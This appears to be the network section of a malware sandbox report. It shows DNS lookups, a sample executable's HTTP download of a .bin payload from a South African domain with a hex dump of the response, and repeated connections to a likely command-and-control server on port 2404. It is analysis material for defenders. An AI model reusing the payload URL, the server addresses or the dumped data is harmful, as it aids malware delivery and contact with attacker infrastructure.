                                            Jan 8, 2025 15:08:33.438857079 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.438864946 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.438898087 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.441665888 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.441685915 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.441715956 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.441723108 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.441760063 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.441780090 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.442013025 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.442028046 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.442064047 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.442070961 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.442082882 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.442110062 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.524682045 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.524699926 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.524739981 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.524749041 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.524772882 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.524805069 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.524991989 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525007963 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525032997 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525039911 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525062084 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525084972 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525311947 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525326014 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525367975 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525373936 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525383949 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525407076 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525532961 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525547028 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525583029 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525588989 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.525609970 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.525624037 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.526671886 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.526688099 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.526730061 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.526736975 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.526762009 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.526781082 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.527061939 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.527080059 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.527117968 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.527124882 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.527151108 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.527163029 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.661278963 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661298990 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661379099 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.661398888 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661438942 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.661746025 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661761045 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661806107 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.661813974 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.661853075 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.662117958 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662133932 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662169933 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.662178040 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662214041 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662225962 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.662234068 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662250996 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.662266016 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:33.662271976 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.662308931 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.665849924 CET49794443192.168.2.7164.160.91.32
                                            Jan 8, 2025 15:08:33.665864944 CET44349794164.160.91.32192.168.2.7
                                            Jan 8, 2025 15:08:36.382961035 CET498302404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:36.387780905 CET24044983087.120.84.23192.168.2.7
                                            Jan 8, 2025 15:08:36.387855053 CET498302404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:36.393419981 CET498302404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:36.398201942 CET24044983087.120.84.23192.168.2.7
                                            Jan 8, 2025 15:08:57.737471104 CET24044983087.120.84.23192.168.2.7
                                            Jan 8, 2025 15:08:57.740104914 CET498302404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:57.740163088 CET498302404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:57.744980097 CET24044983087.120.84.23192.168.2.7
                                            Jan 8, 2025 15:08:58.755501986 CET499692404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:58.760993004 CET24044996987.120.84.23192.168.2.7
                                            Jan 8, 2025 15:08:58.761100054 CET499692404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:58.764600039 CET499692404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:08:58.769428015 CET24044996987.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:20.148286104 CET24044996987.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:20.148425102 CET499692404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:20.148478985 CET499692404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:20.153239965 CET24044996987.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:21.152740002 CET499722404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:21.157690048 CET24044997287.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:21.157773018 CET499722404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:21.161396027 CET499722404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:21.166158915 CET24044997287.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:42.537499905 CET24044997287.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:42.537707090 CET499722404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:42.537707090 CET499722404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:42.542577028 CET24044997287.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:43.542901039 CET499732404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:43.547833920 CET24044997387.120.84.23192.168.2.7
                                            Jan 8, 2025 15:09:43.548105001 CET499732404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:43.551271915 CET499732404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:09:43.556032896 CET24044997387.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:04.942087889 CET24044997387.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:04.942337990 CET499732404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:04.942337990 CET499732404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:04.947292089 CET24044997387.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:05.952302933 CET499742404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:05.957426071 CET24044997487.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:05.958089113 CET499742404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:05.961296082 CET499742404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:05.966048002 CET24044997487.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:27.348728895 CET24044997487.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:27.348793983 CET499742404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:27.348865032 CET499742404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:27.353610992 CET24044997487.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:28.355660915 CET499752404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:28.360791922 CET24044997587.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:28.363091946 CET499752404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:28.366328955 CET499752404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:28.371151924 CET24044997587.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:49.739963055 CET24044997587.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:49.740017891 CET499752404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:49.740067959 CET499752404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:49.744821072 CET24044997587.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:50.746145010 CET499762404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:50.750972986 CET24044997687.120.84.23192.168.2.7
                                            Jan 8, 2025 15:10:50.752094030 CET499762404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:50.755340099 CET499762404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:10:50.760122061 CET24044997687.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:12.134258032 CET24044997687.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:12.134329081 CET499762404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:12.134382010 CET499762404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:12.139101982 CET24044997687.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:13.136768103 CET499772404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:13.141711950 CET24044997787.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:13.141803980 CET499772404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:13.147056103 CET499772404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:13.151803970 CET24044997787.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:34.521817923 CET24044997787.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:34.522128105 CET499772404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:34.522166014 CET499772404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:34.526972055 CET24044997787.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:35.527493954 CET499782404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:35.532516956 CET24044997887.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:35.532607079 CET499782404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:35.535697937 CET499782404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:35.540522099 CET24044997887.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:56.881239891 CET24044997887.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:56.881423950 CET499782404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:56.881423950 CET499782404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:56.886231899 CET24044997887.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:57.886930943 CET499792404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:57.891810894 CET24044997987.120.84.23192.168.2.7
                                            Jan 8, 2025 15:11:57.892005920 CET499792404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:57.895464897 CET499792404192.168.2.787.120.84.23
                                            Jan 8, 2025 15:11:57.900221109 CET24044997987.120.84.23192.168.2.7
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 8, 2025 15:08:30.427639008 CET5994953192.168.2.71.1.1.1
                                            Jan 8, 2025 15:08:30.852288008 CET53599491.1.1.1192.168.2.7
                                            Jan 8, 2025 15:08:36.369961977 CET5423953192.168.2.71.1.1.1
                                            Jan 8, 2025 15:08:36.381737947 CET53542391.1.1.1192.168.2.7
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 8, 2025 15:08:30.427639008 CET192.168.2.71.1.1.10xa9b3Standard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                            Jan 8, 2025 15:08:36.369961977 CET192.168.2.71.1.1.10xa273Standard query (0)newkezfill.siteA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 8, 2025 15:08:30.852288008 CET1.1.1.1192.168.2.70xa9b3No error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                            Jan 8, 2025 15:08:30.852288008 CET1.1.1.1192.168.2.70xa9b3No error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                            Jan 8, 2025 15:08:36.381737947 CET1.1.1.1192.168.2.70xa273No error (0)newkezfill.site87.120.84.23A (IP address)IN (0x0001)false
                                            • www.healthselflesssupplies.co.za
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749794164.160.91.324436596C:\Users\user\Desktop\KO0q4biYfC.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-08 14:08:31 UTC198OUTGET /PLBVeySxbfKXMM176.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: www.healthselflesssupplies.co.za
                                            Cache-Control: no-cache
                                            2025-01-08 14:08:32 UTC404INHTTP/1.1 200 OK
                                            Connection: close
                                            content-type: application/octet-stream
                                            last-modified: Wed, 04 Dec 2024 06:06:53 GMT
                                            accept-ranges: bytes
                                            content-length: 493120
                                            date: Wed, 08 Jan 2025 14:08:32 GMT
                                            server: LiteSpeed
                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                            2025-01-08 14:08:32 UTC16384INData Raw: ed 33 dd 90 0e a3 86 65 a7 4a a6 c2 24 43 14 fd aa f5 4e fc 39 c3 65 0a cf aa fe 4a 5f e0 02 fc 9b 0d d4 0f 88 79 78 14 3a 1c be 90 54 b8 1a 43 70 a3 17 fa b8 05 c5 6b d4 4f 78 25 b1 ec 56 62 47 18 5f 92 f1 4e a2 bd b3 56 08 88 82 dc 50 cd 56 b1 74 ef 52 62 eb ca 4f 2b 3a f8 66 19 26 d0 c3 2e b5 e4 8f c1 0a f8 a9 3d 2f 1c b5 56 5a 1a 52 be bc 08 cf 79 b6 f5 00 8d cf 3f ad 2f 72 eb c2 30 c9 d0 6f 16 5b 91 de f9 4c f2 85 69 fb 5c cb 33 88 64 e9 ec 48 34 75 83 9c 51 df cc 3d d4 95 f9 b5 81 fa fd 17 e7 c8 d4 bf e5 89 df b3 22 3c b7 2d 6b ed 5c 1e 6e bd 37 14 66 e0 4a a7 d2 58 55 f5 c2 a7 d3 81 97 6b 40 d2 67 81 8f 8b 6b 95 b9 64 80 bd 36 6a 0c e6 34 6f b9 01 ac aa 9b 14 32 1c 37 d5 03 ac c1 e9 d6 51 b1 59 a0 99 bd 7b d0 52 2a 0b d8 d3 1b 62 1b 96 06 2f a4 d0
                                            Data Ascii: 3eJ$CN9eJ_yx:TCpkOx%VbG_NVPVtRbO+:f&.=/VZRy?/r0o[Li\3dH4uQ="<-k\n7fJXUk@gkd6j4o27QY{R*b/
                                            2025-01-08 14:08:32 UTC16384INData Raw: b8 ca cb 79 e0 0a 74 a9 c7 b4 54 c6 b9 22 33 d0 23 36 97 6b ad a3 a6 18 1d 41 3c 6c a3 bf 6c a8 d0 cc 64 7c 71 84 10 ee ea b9 4f 4a af 6f 1e 26 5c 2a 32 9f b4 76 17 42 a5 e1 c1 1b 2e fd 25 fc 45 e6 c5 51 13 64 12 f1 4a a4 e8 4a f4 87 f3 f7 9b 8e ce 4f a7 9f 58 74 2f 80 b2 2f 69 e1 8d 1a 7f 21 9d b3 5b 25 3e 1f ba b1 66 c0 6b e7 e8 6f 4a d0 24 1d 9d 47 91 19 f3 cb a4 cc 64 8c 19 1c 68 dd e1 1d 0e d2 d8 d3 3f 39 56 13 8a 27 e4 40 da 5f 7b c1 86 66 02 7c 68 ff d9 dc 37 20 ee 28 a7 79 41 32 e2 b6 87 85 db 6c b0 f5 69 09 71 6a c3 7a 06 ad 68 dc 6d 51 72 bd 86 b5 a1 cd b2 27 95 88 56 2d 97 65 1f 96 0b 0d 4d 73 ce 60 87 92 47 fd 29 3d 1d e5 dd dd 6c ac 39 ab a1 cd 93 68 fe 1e 1d f3 d8 42 1e 23 94 f9 58 fa 17 d6 10 39 27 e0 8c a3 40 71 c5 48 4d fc 9f 9f e1 82 77
                                            Data Ascii: ytT"3#6kA<lld|qOJo&\*2vB.%EQdJJOXt//i![%>fkoJ$Gdh?9V'@_{f|h7 (yA2liqjzhmQr'V-eMs`G)=l9hB#X9'@qHMw
                                            2025-01-08 14:08:32 UTC16384INData Raw: 73 c6 30 ee b1 31 0d 46 e0 65 0d de b5 7a de 22 4e 1d 8f c4 75 c4 b5 a0 24 61 75 1c 0f 34 f1 5c 3f 2b 86 9f 63 ac fe 36 70 b4 c8 54 da 3f c5 5b 55 65 81 d0 0a c0 13 63 60 23 d7 fe 8e c0 a0 59 55 26 1d 5f ca 23 42 61 5d 45 20 e6 1b 30 4c a9 5d d7 1a 20 f3 67 b1 28 b2 13 ce 29 69 2a 47 d7 e0 c2 61 a2 15 a3 33 7f 21 49 fd 40 48 46 8a 10 b3 90 f0 63 0e cb 1c 00 a7 f5 c3 ad 0c f0 d8 77 85 f1 cb bf a0 a3 63 ff 9f eb 77 51 f9 e2 82 c6 d0 36 d4 22 55 eb 27 21 94 ac 87 4c 7e 21 43 d2 09 b4 3a d0 80 eb 24 d1 c1 7d 4e ab 10 97 2b 3a 6e b7 7b b7 0e d3 a7 0b cf 94 c5 51 21 08 ce 1b 9e 36 79 62 e6 27 f5 bc 40 9c ff 6f 99 41 c5 e6 9f f9 5d e4 3f 15 23 00 b5 f1 1b 0b 62 21 76 af 22 f9 5d 4a 3b 94 99 a3 5e a7 2b 99 a9 1d aa be 23 4f 98 31 15 d8 f7 09 cc 4e d2 b9 a2 39 a9
                                            Data Ascii: s01Fez"Nu$au4\?+c6pT?[Uec`#YU&_#Ba]E 0L] g()i*Ga3!I@HFcwcwQ6"U'!L~!C:$}N+:n{Q!6yb'@oA]?#b!v"]J;^+#O1N9
                                            2025-01-08 14:08:32 UTC16384INData Raw: 7c ac 5c 34 60 73 88 12 e5 66 0c f0 81 9b 15 86 d7 32 60 de 77 2a 2a eb d8 23 c1 b6 e1 3a 15 21 80 20 27 99 c8 0e 83 b9 34 dc ec 87 e5 00 1a d1 11 06 99 f8 8a d1 48 99 c5 09 ca ac 17 a0 d7 48 94 27 a4 aa e0 5d c9 0e 25 5e fe bb ce 6f b1 36 61 18 e7 27 27 e8 0d a5 46 0a e7 26 b1 d6 96 24 65 05 a3 02 ed 10 9a e6 c9 39 04 aa e4 1e 6d 0b 5e 86 62 3b 4a 27 31 19 9c fa be 4f 73 cc 90 3b a9 26 d4 bc 9a 09 cc b9 08 4a 5c e3 91 b9 ec a6 dc 93 cc 66 53 39 25 4a a9 21 52 09 3f 7c 97 4a 6c 5a aa b7 84 86 7b bc 9b 3e 39 b3 88 a2 1b 55 7b 1c 5f 29 3f 39 a6 ba 59 5d 5a 60 6f 15 d7 07 3e 7a 43 93 b1 07 2f 1b 0f 33 b9 d9 f1 89 80 a1 19 f6 aa aa 90 93 be e7 a0 73 82 55 ee d2 29 cb c5 ad 50 d8 65 81 a0 79 2e ab c4 09 5a 5f e2 df ec c3 18 3d a2 b3 41 ec 37 6e f5 a1 44 8d 79
                                            Data Ascii: |\4`sf2`w**#:! '4HH']%^o6a''F&$e9m^b;J'1Os;&J\fS9%J!R?|JlZ{>9U{_)?9Y]Z`o>zC/3sU)Pey.Z_=A7nDy
                                            2025-01-08 14:08:32 UTC16384INData Raw: f4 40 0c be 0d 5a f3 7b 13 e2 ac 67 4b ac ec 85 ad 01 b0 0f cc 32 a7 12 f3 31 e5 03 43 52 dc 12 5a 66 53 89 1b 1b ee 50 53 5c b4 a3 30 4d 8d 5f ca e1 3f 77 f2 ae 9c c0 48 a3 8e 19 18 ab 7d a2 d8 2a 2d ac 3c 8a 46 88 12 20 84 77 e3 07 6c 7d fd 0d bc fb d0 bd dd 50 fc 43 2c ce 69 d4 95 d8 80 47 14 93 ae 90 8f 33 6b 3c 15 c7 46 da 88 ad 89 66 74 e2 11 fe 26 20 6a 07 54 a7 b6 8d 43 c5 88 4a e7 e5 97 24 bc 13 6a 5a c7 19 e2 83 94 0b 23 02 ae 55 dc 7c 39 22 47 83 2b 8a e0 28 81 8e d7 a5 b6 c4 ff 26 1f 2a 60 ab 90 a0 d1 b6 b6 9d 07 c9 35 d0 f3 ba fd 12 5f 68 89 ca c5 86 50 82 b2 10 cf 57 9b d8 8b 75 89 13 0f 6c 34 a3 04 e9 7f d0 a7 6c 09 e2 e1 de 0c 3a f9 e3 5c c5 c6 36 e8 fc 2c da 86 b7 2f 5e d1 68 4c 1c 00 8f 2c 8b 41 80 95 6a 8c 9a 54 e5 b4 93 56 c4 e0 7a f8
                                            Data Ascii: @Z{gK21CRZfSPS\0M_?wH}*-<F wl}PC,iG3k<Fft& jTCJ$jZ#U|9"G+(&*`5_hPWul4l:\6,/^hL,AjTVz
                                            2025-01-08 14:08:32 UTC16384INData Raw: 9e 1f 85 c9 63 ab 1f 0e 8f 4a a4 db 2b 2d b5 98 19 4c a8 33 5d e9 18 29 60 7d f2 68 44 0b 5f ab 3e f8 b3 79 36 95 54 7d 9e 8d 13 54 e2 63 08 5d 42 44 b2 67 94 6f 70 57 96 34 0f 9c 3f 30 1f 83 f6 d0 33 b1 bc 12 13 e3 f1 d1 60 14 ae ba 78 70 e9 1c 32 74 61 02 bd 1b 8f 78 66 ab bd 18 f4 83 f3 8b af d0 0b 21 89 f5 40 e1 ae a6 87 36 8d 4d d7 96 03 84 4d 1f 2e 98 f4 51 63 76 2d 61 a2 0e a3 3e 8c ba 26 dd b4 ef e8 d5 90 34 fa 92 63 be 08 5f 20 02 d8 fc 7d 8e ce e4 42 f9 56 d8 22 27 38 75 39 f5 16 85 9b a7 1c fb b7 33 31 0b c2 bb ec 67 d1 a7 a6 d2 05 f2 1c c5 58 0c 4f 91 29 7f ee 6a d1 69 79 41 11 ce f3 dc d4 7d 3f 41 10 cf 51 82 c3 78 75 da 2d 9e 9d 48 b1 9c ef c9 58 d5 18 8d 21 b5 5f 09 56 dd ea 86 c5 47 39 ef 3a 5f f0 b4 04 70 8d 62 8f 62 06 fc 76 c0 4c e5 dc
                                            Data Ascii: cJ+-L3])`}hD_>y6T}Tc]BDgopW4?03`xp2taxf!@6MM.Qcv-a>&4c_ }BV"'8u931gXO)jiyA}?AQxu-HX!_VG9:_pbbvL
                                            2025-01-08 14:08:33 UTC16384INData Raw: ec b6 76 b6 c7 e5 e7 b6 8e 0b 96 50 a4 f2 a2 1a 13 3f fb c6 57 ff 24 04 fa 34 fa c2 cb 80 c0 c0 7b 76 4d 46 e2 9b 02 5a 54 e1 c9 be ab 33 4b ee 38 95 9a 95 ce f7 a3 d9 ac 17 15 8a 12 36 60 bc 0f f9 f8 8f 6e 7b 5e 06 09 e5 c0 e4 b5 f2 4a ba 00 c4 6e 11 09 d8 19 7f 04 f0 36 a5 e7 5a 91 db e8 7b 10 44 9a 80 16 13 f2 f8 08 a0 a6 2a 49 ee 59 87 f7 40 f1 a9 b9 e7 51 ee a5 ca 1a d4 d4 f2 37 f6 e1 c5 fb da 12 70 52 7c c6 2b 34 2e 58 c4 b2 eb bf 1b 79 23 c2 76 b0 ee 49 c8 9d 6d c1 14 23 01 4e 53 f6 5e bf d1 f8 50 5a 35 c6 05 f9 75 14 2e 76 d0 bc de 6c 73 07 53 44 e9 6d 6f a6 29 f8 bb a7 fc f1 10 c5 6d 98 47 ae 69 54 fd 33 28 60 78 bf a4 90 00 22 5c c3 dd 9e 39 a3 7b b5 56 2b 7b cb 6d 0a 55 90 5e 2a df df 5c ab 2a d3 06 fe f0 95 34 1e bb 05 ca 10 24 e0 f1 b4 ce 11
                                            Data Ascii: vP?W$4{vMFZT3K86`n{^Jn6Z{D*IY@Q7pR|+4.Xy#vIm#NS^PZ5u.vlsSDmo)mGiT3(`x"\9{V+{mU^*\*4$
                                            2025-01-08 14:08:33 UTC16384INData Raw: aa 06 00 e0 7b 09 88 85 e9 e5 ca d6 2a fc 1c 81 c4 7a 05 e4 84 c6 63 1a 8c 03 d4 5f eb ca 2b 08 8d 2d d3 2f 3a 56 39 20 a1 bd 51 9e be 20 4e 27 46 0d 1e ad 29 1c c7 45 12 ea 85 22 81 4d d8 e0 72 d0 bf 26 2c ff ed 24 11 01 62 fe 2a d2 a1 84 8d 3b 4f 9d 0a 66 d4 ee 2e 4e b9 f2 b8 6c 14 94 b4 e2 66 c3 a5 c2 df 51 b6 47 27 48 fe 59 73 25 5d f2 f7 aa 13 71 54 d9 1f 5c 6f 4c 5a 07 13 fb 84 de 1a 28 38 63 ca 00 68 cd 5c cc b9 b7 ea ac 2c 7d a9 14 4a f7 a6 0e a3 0d 16 cf ef 7d 05 52 eb ab 14 50 5e c5 db a2 5a 4a 10 d5 f7 98 9c 4f 19 02 ea 72 f0 4f 35 c7 b7 2c 42 a4 37 83 15 b0 4f bd c4 c1 d7 ff ee 53 59 b8 e2 a3 c0 61 90 fd 14 d7 da b2 0b bb 0b d0 0d ea 01 53 2d 06 80 96 bd e5 10 8b 3a 32 46 10 46 9f b9 20 06 4f 99 83 03 bd 84 03 9e c9 f2 95 40 1c f8 23 36 12 40
                                            Data Ascii: {*zc_+-/:V9 Q N'F)E"Mr&,$b*;Of.NlfQG'HYs%]qT\oLZ(8ch\,}J}RP^ZJOrO5,B7OSYaS-:2FF O@#6@
                                            2025-01-08 14:08:33 UTC16384INData Raw: 71 6a 67 b0 bb 4a de 87 1e 20 6b 55 8a c3 3a 35 8a 2a fb 35 f5 e4 c4 cd 5c 9e bf 02 45 16 16 95 93 a8 b3 64 86 62 04 e5 97 02 f5 d0 c8 92 20 64 54 75 4a 48 8f 0f 0c 99 19 c0 df 84 4c 24 19 c4 f5 4b 76 67 5c 80 35 90 e3 20 4a 8f 7f 27 fd 80 69 e6 0d 14 9a c5 e1 84 05 eb bc 2f f1 fd 1e bd fa b3 95 78 a9 28 69 61 77 11 b0 0d 4c b2 a5 1a a3 e9 72 01 52 76 62 a7 4b 74 df 2b db 83 08 14 0f 76 cf 85 9a 7e 87 2e 3f 2e fa 36 60 ae c5 2d 4d 57 17 b8 a2 45 03 a8 45 7c 01 d5 6b 26 d7 30 be 30 5f 24 a4 ab 32 f2 ed c5 ee 40 8e cb 1f 36 ad 59 0c 78 b7 1a d8 67 79 f5 43 a6 61 da e5 05 7b 6a d7 cb 35 b3 2d 1f de e2 b6 1f f2 62 62 6c 5b 6f 9a 19 d7 0d d4 fb 63 88 4a 47 32 2f fb 9a 35 88 d6 41 fe 0a 86 84 db 6d 7f 72 1f 56 38 93 41 aa 09 fc 85 b3 ca 87 63 df 28 8c cf e5 6a
                                            Data Ascii: qjgJ kU:5*5\Edb dTuJHL$Kvg\5 J'i/x(iawLrRvbKt+v~.?.6`-MWEE|k&00_$2@6YxgyCa{j5-bbl[ocJG2/5AmrV8Ac(j
